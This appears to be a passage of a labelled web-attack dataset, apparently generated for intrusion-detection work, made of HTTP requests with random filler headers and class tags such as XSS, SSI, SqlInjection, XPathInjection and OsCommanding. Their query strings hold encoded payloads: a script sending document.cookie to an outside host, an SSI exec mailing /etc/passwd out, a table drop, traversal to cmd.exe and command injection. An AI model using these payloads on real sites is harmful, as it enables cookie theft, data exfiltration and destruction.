Cookie2: $Version="046"
Date: Fri, 05 Feb 10 24:16:56 UTC
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: oearta@nsBier05.net
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Mon, 16 Aug 04 07:38:18 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 831
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: NTLM dWV6eXJpZTN1SWVuaU5uYTZhc29tYXB0dTRyc3RoZWc=
Range: 387259-2,9-
Referer: /oguf/njxeejo.fgf
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: jtae/2.6.8.8.3
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5688x504
Via: HTTP/6.5 187.108.152.187
Transfer-Encoding: a2ltoS; isYr=op4rf
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43541
Start - Id: 47173
class: XSS
GET /ehinwtt/u5wjzfz/Mihhrctu3maTtldirinn.png?rtsjli7wo=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.olnins.com%2Fcgi-bin%2Fison.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E HTTP/1.1
Host: www.IicRnid.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: I1e-oeircl3;q=0.9
Cache-Control: no-cache
Client-ip: 102.236.20.245
Cookie: eaei4cTn0oeve=643;etm6op9bu=2101234359;a1alsawtcoo=sX-;rln=339
Cookie2: $Version="1"
Date: Mon, 18 Jan 10 07:43:52 GMT
ETag: "jeUvSwK29ptQR8mMDwe"
Expect: bltUcf=Sn6ay
From: 51p19@sa8nrs7ro.biz
If-Modified-Since: Thu, 30 Oct 08 03:26:49 CET
If-Unmodified-Since: Sun, 09 May 04 08:27:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 2190
MIME-Version: 2.0
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: fknAlS Ahcta9Sh=rtij
Range: -016,1-,67332-47295
Referer: http://tyrC7.fr/Xmte/0rjta.php3
TE: deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 0.1; it-a7; rv:1.8.5) Gecko/76599348
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47173
Start - Id: 40048
class: SSI
GET /raT/bHMf/7Sl/cex8egxre0tusvnj.dll?hddTseina=httpsl1k+%24iips0agtHb9ur&iTtdston=56679&cietenoRadnkrin=bo%27vershhhtle&oRbnureooomdNty=s7KouFWWW4&hNrtefyzadwZmrt=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fmail++++ss0db.com++++%3C++%2Fetc%2Fpasswd%22--%3E&pNvbNctnlAty=tltw&Bvwxxi9u=iE5hymailb%22%24%227onee%3F%5Cel&es=l6IS&ErRIydzyuce=3&ktbssteoy=01&Zqnullvbscript9KSSkrQ=94091&n0raycBe=f7_093 HTTP/1.1
Host: www.thnua1aest.org
Connection: keep-alive
Accept: audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.1
Accept-Language: t-trsnko;q=0.7, deR-rn4ahtit
Cache-Control: no-cache
Client-ip: 80.3.170.218
Cookie: ijy=scriptualinktn'm)
Cookie2: $Version="85"
Date: Tue, 06 Jun 06 09:36:03 GMT
ETag: W/"_YyATWc.DaW8pqMUzOx"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Sat, 04 Dec 04 23:30:52 GMT
If-Unmodified-Since: Tue, 14 Oct 08 12:43:58 UTC
If-Match: *
If-None-Match: "X8V@lzT2U6VFNOzvHy"
If-Range: *
Max-Forwards: 7086
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: Digest response="d4acc16FbFb28fC2120C46A686819ff0"
Range: 92956-
Referer: /e5i1Fak.html
TE: trailers
Trailer: User-Agent
User-Agent: nttiyNOe
UA-CPU: MIPS
UA-Disp: 490,576,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4665x776
Via: munr/7.3 161.214.68.211
Transfer-Encoding: gzip
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40048
Start - Id: 48894
class: XPathInjection
GET /pEG/0updateQlmeta/0lxCHnPbVetc7xcQ/ed2VWC7I-osm591t/Aall5BrcRBuQLAstyleN/ao2Ha/fospktut/nh/2FJMvQ13ujYoqM/9ftpRDihHxp_FXGX.nsf?oceehaf=4656139&tfefcdomeaooes5=aimiactr%40ftepltotmh9&ashrfewySln=55638825&Rsrsi7yiiogtGj=e5o3c&kKgao=5&uaa=rY9C%27++++or+++%28i+++%3C+++++count%28igtut%2Fchild%3A%3Atext%28%29%29+++and++j+++%3C+++count%28pspH%2Fchild%3A%3Acomment%28%29%29+++and+++k++++%3C+++++count%28ifhil%2Fchild%3A%3A*%29+++%29++or+++%27y0ei42%27++%3D++%27++++ssdsp06%27++or&an=l&er=738&bthz1abeslptt=lDYU&HU4u5is=712&desMElhwy=hVBMtv&Ithuicn=84805313 HTTP/1.1
Host: 70.214.112.17
Connection: T7ye
Accept: image/png;q=0.3, audio/basic;q=0.4, video/mpeg;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 78.151.63.45
Cookie: fdcmiseaTrud=o8ZBaKF6j-m;zD7hP=55247;dtma=]t drop;CQgO.5=m0;Wo_4img=0
Cookie2: $Version="74"
Date: Tue, 18 Apr 06 05:26:07 UTC
ETag: W/"TrWjpzVlNZvmYDKkV"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Wed, 27 Aug 08 13:00:16 UTC
If-Unmodified-Since: Sat, 12 Jan 08 20:02:08 UTC
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 29 Nov 09 16:47:01 GMT
Max-Forwards: 186
MIME-Version: 4.6
Pragma: inlmGhgD='et9s'
Proxy-Authorization: 4rsp niEgc=ieadet
Authorization: crIt 4rsmildy=qdtdsat
Range: 87-22
Referer: /0tho/0taK.asmx
TE: trailers
Trailer: User-Agent
User-Agent: bplbuAdz http://www.hp0oal2.cz
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: aiaoc/6.2 www.wgAaa.js, 5.6 132.104.191.101, 9.0 www.nnsptt.png
Transfer-Encoding: deflate
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 981784
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48894
Start - Id: 49086
class: XPathInjection
GET /bNsa3sCJQYmzuW4UnwZ/e7ErXTijbpjkyq/Yl/orB/rcpKfmXuC/ohe/epoNdzdmlToiar8bfveA/2tacIvstanEum8idva/ju72YJYUieh/xn/ei1o3ru1hcre4y/8_fdTQxm69edN4s.mspx?eowagsnyd24ye3=xmlnnEb%27Nuppaoneb%28%40metaistyle&dbEi=583&h46CEf=ehLEKuR3Ns3X&rlte=1+++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+0090%3D&D@n@E@ab2h@=%29Ge%3A&i8sy=1780&mfuiwhp=3611453315&cV=cqso8iinuuhecsood4&7uerz=80151 HTTP/1.0
Host: www.sdwlE4p.uk:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=66324
Client-ip: 111.104.86.65
Cookie: 56i=afg;eae4Ieiea1ttwto=5entrioRuiyotjni;peatocck=hfi_8Z_y
Cookie2: $Version="128"
Date: Sat, 17 Jan 04 15:59:46 UTC
ETag: W/"qnDBCfbZuKmSGx_h3.Q."
Expect: uotniqud=2tuam1Po;Hd2ei
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Sat, 15 Aug 09 22:23:50 UTC
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 49
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZXRhdGVzbGE6Mm9UdElh
Authorization: NTLM dENuaWx3ZWRoZGF0ZXB1ZWVzT2MzQXRtdTlka3ZtVHBkZWU0YWxvYWV5YXNpdmVz
Range: -39415,-80233
Referer: http://www.v21tetfn.st/mevqf/7SCarmnw.jpeg
TE: gzip;q=0.7,gzip
Trailer: Upgrade
User-Agent: rMaRrbi_t http://www.tyrs.be
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 7.6 www.goib.tiff
Transfer-Encoding: compress
Upgrade: 5yOeb/5.2, csz/2.8, soyn/4.8, ngtnf/9.9
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49086
Start - Id: 35180
class: SqlInjection
GET /ioIGge7TwlSTBwXf.php?smlegehcooirtbn=hujt8sl&tidiN4ndrKclimr=dkwEeyvx&eonNt5o74=tbgstylee&9FoKqRa.=namoaat2lkrY&passthrug8W1LpsAQKx=902208&cmdcS%u.x=om0nPs3295yg&ha81eitnz=ncmd&mig=tkAlw&xl0qap=31433&1NeituU=%27%3B++++drop+table++++admin&ZCcUh=502&cSriektq=319192&mxyela8r9Hld=nf&aEaedtg=hnhbtyh%5CmA HTTP/1.1
Host: 12.129.33.127
Connection: mkehtgR
Accept: audio/*, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: eea=e8mkAx1f
Client-ip: 190.117.195.127
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="3"
Date: Sat, 08 Apr 06 02:58:23 GMT
ETag: "03P6MG1v10dHj@5U"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Wed, 17 Sep 08 16:54:06 UTC
If-Unmodified-Since: Tue, 23 Jun 09 02:12:31 UTC
If-Match: "011Lc6Xagygdb0fvLF"
If-None-Match: "af2RR3WxHISuLZUy"
If-Range: "pu.YBhncA2mIlAb"
Max-Forwards: 5
MIME-Version: 2.3
Pragma: p2ziuc='dr'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Basic c2FyYWJMOmVwRXVpdA==
Range: 5131-,-0
Referer: http://www.nugc.st/ese0eYe/eaEuH.jpg
TE: trailers
Trailer: From
User-Agent: Mozilla/2.1 (Machintosh; U; Mac OS X 5.1; as-rt; rv:0.8.5) Gecko/08693122
UA-CPU: StrongARM
UA-Disp: 571,0582,16
Via: 6.7 www.eaab.htm, 1.1 115.68.202.133, 4.6 www.oroetH.gif
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35180
Start - Id: 40876
class: SSI
GET /htzdVAgpolsit78simsU/hwj4kselectnIE0a/t0NVWsRImevX/6c/s5pM/zophrnoE3/3Fo17locationW469.Ug/9We1mail.png?uig5rytasN=%3C%21--+++%23odbc++++statement%3D++++%22select++++pwhhgas%2C+Tt%2C++vn7yiswh++from++hse3h++order++++by++8%2C++++853%2C++6%22+--%3E&smmttfoxtbeoE=ele&p5=replace%5CS&bb6eemumip=sn%2Fe%3CnLsentzadfexec&ee=%28ntac&ouowTeemrogt=mZAgteqclde&husurnrqorreiC=2%3D%7E&86kHr6=suuehl&XySprocessing-instructionUx7Dj_FE=9Nf&euo=asH.1ni&sie=7&4MkmNtT29rhhLe=o%3Aetoh%40Er HTTP/1.1
Host: www.tnn1oa.cz
Connection: fle12
Accept: application/zip, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.3
Accept-Language: W0n-aonc, i9erekt-Qe7hvhy4, xOaavs-5fbPepnr, eNnli-so7nccs
Cache-Control: no-transform
Client-ip: 87.173.177.252
Cookie: lsrk=05;bOote=57394883;3@sJ_=gN.;0Pybin=admin;s/t;U.Yb4-GuZ8=ti?d<
Cookie2: $Version="63"
Date: Mon, 31 Jul 06 23:42:13 GMT
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Mon, 06 Dec 04 18:46:00 CET
If-Unmodified-Since: Sat, 05 Feb 05 12:40:12 UTC
If-Match: *
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: "MQ86-NJx_XcdWl6"
Max-Forwards: 94
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 1-,-16972,856295-5
Referer: /hehh/dobahz.pdf
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: toIltGtE
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/9.1 98.242.12.0:80, 9.8 www.1mioo6.gif:49
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40876
Start - Id: 46488
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: 19.8.164.235
Connection: close
Accept: image/*;q=0.2, audio/*;q=0.7, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.2, gzip;q=0.7, identity
Accept-Language: *
Cache-Control: max-stale=46800
Client-ip: 137.78.176.107
Cookie: k9PGff1aoWDn=iatqtbo7epedo;eTL0iri9trtpe=r7ch@deihdo;nntrs=0395;ssf9eAOdlt6ro=tdlibbnetcatv(affdi4 riss/j;AHNYq=arR;sFKIzsWsystemHnode3a=ei
Cookie2: $Version="5"
Date: Wed, 30 May 07 07:52:28 UTC
ETag: "XgEaHknSpO0avcsEQ"
Expect: ith49hei=hrdod6si
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sun, 13 Jul 08 07:51:28 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 09:32:05 UTC
Max-Forwards: 445
Pragma: iyb7u=etotEb
Proxy-Authorization: detou Jxsacw=pheC
Authorization: teoNco nota=eade
Range: 875-8,3042-7550,-21263
Referer: /dsnar4f.wav
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: plusi (x1gLIphYv; aikhUG5iUK; pTdSZe; plL9zQIEYt; bKcqjsOfX)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 616 www.HiVsl3ns.js "wiis9esdak" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46488
Start - Id: 41866
class: SqlInjection
GET /ldBHkBH4jU_/2ct/7.O/atqtdcl/nxIX8BDT.jpg?uga6gAaTtnHp=servicesktnetcat&daisdiqccqb6=%27++++OR+++%27Cnlnctdrpao%27+%3D+++%27+++&cKexecRHallAr5=ieeain++xsystempr&ynO7e=nco65&4poe=964&hezbti5ynt=ledisyia2Ax83&oe=%40&veTaIeet=wohrfneitdb5anmt&oesuQ=Uhot6rwinntmf HTTP/1.1
Host: 159.203.204.149
Connection: ibaat0i
Accept: */*;q=0.9
Accept-Charset: x-mac-roman, iso-8859-7, iso-2022-kr
Accept-Encoding: *;q=0.7
Accept-Language: ch3ply-nefsj, 8Oavolqa-haad1Ada;q=0.6, peohl4en-aof0nai;q=0.7, liete-Erna9;q=0.5
Cache-Control: e='attOop'
Client-ip: 205.53.108.147
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="776"
Date: Thu, 31 Dec 09 13:53:56 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hkedgyn
From: alubns@ssude.cz
If-Modified-Since: Sat, 02 Jan 10 24:30:58 UTC
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: "xaUZu4e300qoa_gd3qG"
If-None-Match: "t6mszVq2X.btelb"
If-Range: Wed, 10 Mar 04 07:26:27 CET
Max-Forwards: 3062
MIME-Version: 7.2
Pragma: nFroini=ooc
Proxy-Authorization: NTLM eGQwcHVjQ2R0ZXJvMm5tcmhhZWpxbGV0dW5lc1R5TWtuNFJtRW4=
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: /ucxsgl.gif
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: ogygv (5-R-i_5quV; cU08Hh; y9W66NUn)
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: wlhee
Upgrade: prc/4.5, 2sFe/0.3
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41866
Start - Id: 48093
class: XSS
GET /u.BF/ms/rWm.Hjx/aegrseqrnisogOdetu/rWenhuA9aidteeaiwo.jpg?28IYDHSJwhere=teemmiEeoegcadteu&REAB=ea+hadmin&1bzstdin=nd%5C&if=latEtneseya8rdaPMi&ndlraa=60&lccgdjrtlS9h=5&pilw=siepd76ydwwieeo&Tk7c9=jtpssajeeye-O&FessEB=w&YZzS=503045&yonagbtud04ti=%3Cimg++++src%3D++%22++mocha%3A%5Balert++++%28%27at%27%29%3B%5D++%22%3E&srrhnTttsewdmn=vbscriptrnph-smet HTTP/1.1
Host: www.wdrkao.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1255;q=0.6, x-mac-hebrew, windows-1250;q=0.6, x-mac-korean
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: min-fresh=18330
Client-ip: 128.96.14.177
Cookie: s.13vP9X=9809
Cookie2: $Version="484"
Date: Sun, 28 Nov 04 12:20:50 CET
ETag: "_kZg_@Z9twta657-o@Y"
Expect: omff=itg8fde;usijt2hi=i7Ponu
From: etsoAo6b@Dfeyr.ch
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: "GcE-g2tQMoCO8S4zzc4N"
If-Range: Mon, 15 Mar 10 24:20:14 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: NTLM NWRlb1JzZXRwOFppblVlMG5kaGNlZWlRb1hhNG1xZW5tYmg4N0x0dzc=
Authorization: Digest algorithm=MD5
Range: -179295,540225-63
Referer: /bceh/otHa.tar
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: ahaetoa (pN1s4O; uYNP5rG; i92Q2AxWUT)
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 356 www.tzeinr.css "til8sinolr" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48093
Start - Id: 36829
class: OsCommanding
GET /eX49vERZqqe/m3rselEetb6e/iAHF7vBGZxBs0/lIspDW/gsau7Ma4nheaap1r/erd.jpg?onal5le=2726263&iTugirnDue9n=167021973&i1VJqH27Tp=90&leaotxnreta=n%3Cs%2Bi&NtmOlkMti1=%27++%3B++cat++%2Ftmp%2Fres++++mail+enin%40se.com+++%3B&mazhiioaRden=5375744 HTTP/1.0
Host: www.rsusEyasn.biz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Encoding: 
Accept-Language: e16r8-rdcot;q=0.7, u6-ebttea, Xprtns-cuf;q=0.8, yfutu-6tlr;q=0.7, ase-i
Date: Sat, 16 Aug 08 16:31:59 UTC
If-Match: *
Authorization: vt3tm mx4S2i=g8stqr
Referer: http://qrzNI.cz/efso/wdek.pl
User-Agent: Mozilla/6.8 (X11; U; Linux i586 9.8; tc-pi; rv:8.3.0) Gecko/13479508

null

End - Id: 36829
Start - Id: 43742
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: 37.106.44.43
Connection: nrmt
Accept: video/mpeg;q=0.1, image/png;q=0.7, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 42.85.153.5
Cookie: geeecaysiwl=t h8dyhyl elIan
Cookie2: $Version="25"
Date: Fri, 14 Oct 05 14:20:54 GMT
ETag: W/"MJRYeoM9MNrdpNUXW"
Expect: e5yilnee=dPfoEs
From: m8Lou@dteama.it
If-Modified-Since: Sun, 03 Jun 07 08:27:55 CET
If-Unmodified-Since: Wed, 05 Oct 05 19:59:45 CET
If-Match: "V8b3qVOFaO6dpiL0RZmv"
If-None-Match: "I7ZTKJT.r8qMVGsDvIRf"
If-Range: Sat, 29 Nov 08 10:17:49 GMT
Max-Forwards: 67
MIME-Version: 0.1
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: 24481-,44476-
Referer: http://rytSe.gov/eyshdyln/ueeu/pyeeras.png
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/6.1 (X11; U; Linux i586 0.9; ep-s0; rv:4.3.0) Gecko/33103792
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 337x2229
Via: gb1/8.8 www.gtrlino.jpg
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 634 www.htFnf.png "gu4mczleeNsgdneeh" "Thu, 21 Aug 08 09:54:11 CET"
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43742
Start - Id: 49667
class: XPathInjection
GET /Qd.NH0RH/nUo@IkeC0a/htsflrzss/bgsoundRbt/mwf4@Nj7F/4abutUOnny/uWOR5.css?ndz6cdiof7lddoA=aemk%3Ewget%28s7-+zpv%7Er&eetac8ee1lfsyIC=+7edbwdhetc&hu0dNscS=ovarE%7Cpylzd&ocr4fibp4ufost=1239+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++++00383%3D&Oofitss=weO&Jdo=bSGflj5g&tERo=ircennNziesEs&t6osylxtci=7&9l0ziwsEo=q-snimgch0&sOPjih=fdquo&4ied0VNlcK=7008889&eY4btenEss=nSLjIqR9K&doef6wqnszlet=g&nilrwdpct0li=yhH9iEtyhdeati7EoD HTTP/1.0
Host: 96.236.28.254:80
Connection: close
Accept: application/*, audio/x-wav;q=0.3, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4, gzip;q=0.3, identity, identity
Accept-Language: m-eaEh9oz, 6ei-ulMne;q=0.9, qexo6-l9h8eel, rnl-snik;q=0.5, licte-ea5;q=0.5
Cache-Control: only-if-cached
Client-ip: 35.126.171.6
Cookie: tywd=urbenmzpion;fh=e s3=bnn;l8ijpevdnteaeT=5781;zSpFihA=e ew0;aylTN=&oamailw6e> nodee
Cookie2: $Version="12"
Date: Thu, 30 Oct 08 11:10:11 CET
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Fri, 05 Nov 04 10:25:35 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 11
MIME-Version: 8.7
Pragma: ivhwle='o'
Proxy-Authorization: Digest nc=F7AF82f1
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: /u5oton/Sozosher/lslrsbc7.php3
TE: trailers
Trailer: Range
User-Agent: wTahZnI4iy
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 176x3474
Via: FTP/7.2 www.5ntO.js, 3.6 195.168.108.149, 1.1 172.125.86.73
Transfer-Encoding: gzip
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 73.197.107.241
X-Serial-Number: 642097
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49667
Start - Id: 47630
class: XSS
GET /mxSmI4qTf_W/ednz-aEp9/ue/w7ww.php3?on9uw9oeclswe=ed&yeo=o4n&hGeIwnq=lNCZM&joovrataeerrt=%3Cxml+++id%3D%22+++++X++%22%3E%3Ca+++%3E%3Cb+++%3E%26lt%3Bscript%3E%5Balert++%28%27ielmoft%27%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++++%3E%3C%2Fa++++%3E%3C%2Fxml++%3E&uonthfsr=2&7fqmetauBbaccept@y=qanee41i&EnLae9t6fh=olctk3igiOteor+&rQOwhere=hJeYI&tw=uo&dpot=8722158799&htreaasi8ipbeci=htT&24t3os=069&AsnrewUtne4lyna=ocirreooeie2alie&RSThrsonml7ze=Wedocumentese%3Fa0exrnetcatinpassthru HTTP/1.0
Host: www.2dnrnis.be
Connection: keep-alive
Accept: image/*, video/*, image/gif;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 58.158.9.220
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="4"
Date: Mon, 17 Dec 07 13:48:38 GMT
ETag: W/"rNt6c_sZROstoX2T"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Mon, 17 Dec 07 08:55:52 UTC
If-Unmodified-Since: Tue, 20 Nov 07 07:43:13 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Mar 05 07:25:49 CET
Max-Forwards: 726
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: ni1yEi btas=Btiewr
Authorization: NTLM ZXQ4bjFlYnQxZGVzdGJ4bm53YXNpb3N0bXRsY3ByQ3Jt
Range: -1463,157-2
Referer: http://sqoj.org/aT0Tr/ew8sRisn/ofipbie.php3
TE: trailers,deflate;q=0.3,trailers
Trailer: Connection
